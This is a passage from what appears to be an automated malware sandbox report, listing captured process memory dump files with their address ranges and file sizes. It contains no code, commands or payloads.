3.2MB
-
memory/3588-443-0x0000000000A30000-0x0000000000A73000-memory.dmpFilesize
268KB
-
memory/3588-453-0x0000000000E70000-0x00000000011AC000-memory.dmpFilesize
3.2MB
-
memory/3588-454-0x0000000000E70000-0x00000000011AC000-memory.dmpFilesize
3.2MB
-
memory/4048-434-0x0000000000E20000-0x0000000000E3E000-memory.dmpFilesize
120KB
-
memory/4048-433-0x00000000719F0000-0x00000000721A0000-memory.dmpFilesize
7.7MB
-
memory/4268-170-0x0000000000906000-0x0000000000922000-memory.dmpFilesize
112KB
-
memory/4268-147-0x0000000000906000-0x0000000000922000-memory.dmpFilesize
112KB
-
memory/4268-174-0x0000000000400000-0x00000000005E6000-memory.dmpFilesize
1.9MB
-
memory/4268-172-0x0000000000700000-0x0000000000730000-memory.dmpFilesize
192KB
-
memory/4636-180-0x00000000007A7000-0x00000000007B0000-memory.dmpFilesize
36KB
-
memory/4636-158-0x00000000007A7000-0x00000000007B0000-memory.dmpFilesize
36KB
-
memory/4636-182-0x0000000000400000-0x00000000005D7000-memory.dmpFilesize
1.8MB
-
memory/4636-181-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/4864-193-0x00007FFAFB3D0000-0x00007FFAFB3D1000-memory.dmpFilesize
4KB
-
memory/5288-440-0x0000000004820000-0x0000000004E38000-memory.dmpFilesize
6.1MB
-
memory/5288-405-0x0000000000080000-0x00000000000A0000-memory.dmpFilesize
128KB
-
memory/5404-391-0x0000000000750000-0x00000000007B0000-memory.dmpFilesize
384KB
-
memory/5472-416-0x0000000000630000-0x0000000000ADC000-memory.dmpFilesize
4.7MB
-
memory/5472-427-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/5472-452-0x0000000006030000-0x0000000006080000-memory.dmpFilesize
320KB
-
memory/5472-404-0x0000000000630000-0x0000000000ADC000-memory.dmpFilesize
4.7MB
-
memory/5476-407-0x000000006FF80000-0x0000000070009000-memory.dmpFilesize
548KB
-
memory/5476-397-0x0000000076C60000-0x0000000076E75000-memory.dmpFilesize
2.1MB
-
memory/5476-398-0x0000000000DE0000-0x0000000001142000-memory.dmpFilesize
3.4MB
-
memory/5476-447-0x0000000005D30000-0x0000000005D31000-memory.dmpFilesize
4KB
-
memory/5476-394-0x0000000000DE0000-0x0000000001142000-memory.dmpFilesize
3.4MB
-
memory/5476-441-0x00000000719F0000-0x00000000721A0000-memory.dmpFilesize
7.7MB
-
memory/5476-396-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/5476-393-0x0000000000DE0000-0x0000000001142000-memory.dmpFilesize
3.4MB
-
memory/5476-403-0x0000000000DE0000-0x0000000001142000-memory.dmpFilesize
3.4MB
-
memory/5476-401-0x0000000003210000-0x0000000003211000-memory.dmpFilesize
4KB
-
memory/5476-406-0x0000000000DE0000-0x0000000001142000-memory.dmpFilesize
3.4MB
-
memory/5476-392-0x00000000031A0000-0x00000000031E6000-memory.dmpFilesize
280KB
-
memory/5496-455-0x0000000000809000-0x0000000000875000-memory.dmpFilesize
432KB
-
memory/5496-395-0x0000000000809000-0x0000000000875000-memory.dmpFilesize
432KB
-
memory/5536-400-0x0000000002320000-0x0000000002380000-memory.dmpFilesize
384KB
-
memory/5596-402-0x00000000002A0000-0x00000000002CE000-memory.dmpFilesize
184KB
-
memory/5596-421-0x000000001B070000-0x000000001B072000-memory.dmpFilesize
8KB
-
memory/5596-399-0x00007FFACB180000-0x00007FFACBC41000-memory.dmpFilesize
10.8MB
-
memory/5636-419-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/5636-409-0x0000000000630000-0x0000000000674000-memory.dmpFilesize
272KB
-
memory/5636-408-0x0000000000570000-0x0000000000597000-memory.dmpFilesize
156KB
-
memory/5736-417-0x0000000000780000-0x00000000007E0000-memory.dmpFilesize
384KB
-
memory/5836-424-0x0000000002730000-0x0000000002731000-memory.dmpFilesize
4KB
-
memory/5836-442-0x0000000005340000-0x0000000005341000-memory.dmpFilesize
4KB
-
memory/5836-438-0x00000000719F0000-0x00000000721A0000-memory.dmpFilesize
7.7MB
-
memory/5836-414-0x00000000003C0000-0x0000000000705000-memory.dmpFilesize
3.3MB
-
memory/5836-426-0x00000000003C0000-0x0000000000705000-memory.dmpFilesize
3.3MB
-
memory/5836-411-0x00000000003C0000-0x0000000000705000-memory.dmpFilesize
3.3MB
-
memory/5852-412-0x0000000000A90000-0x0000000000DD5000-memory.dmpFilesize
3.3MB
-
memory/5852-430-0x0000000001370000-0x0000000001371000-memory.dmpFilesize
4KB
-
memory/5852-448-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/5852-425-0x00000000719F0000-0x00000000721A0000-memory.dmpFilesize
7.7MB
-
memory/5852-431-0x0000000000A90000-0x0000000000DD5000-memory.dmpFilesize
3.3MB
-
memory/5852-428-0x0000000000A90000-0x0000000000DD5000-memory.dmpFilesize
3.3MB
-
memory/6020-435-0x0000000000750000-0x00000000007B0000-memory.dmpFilesize
384KB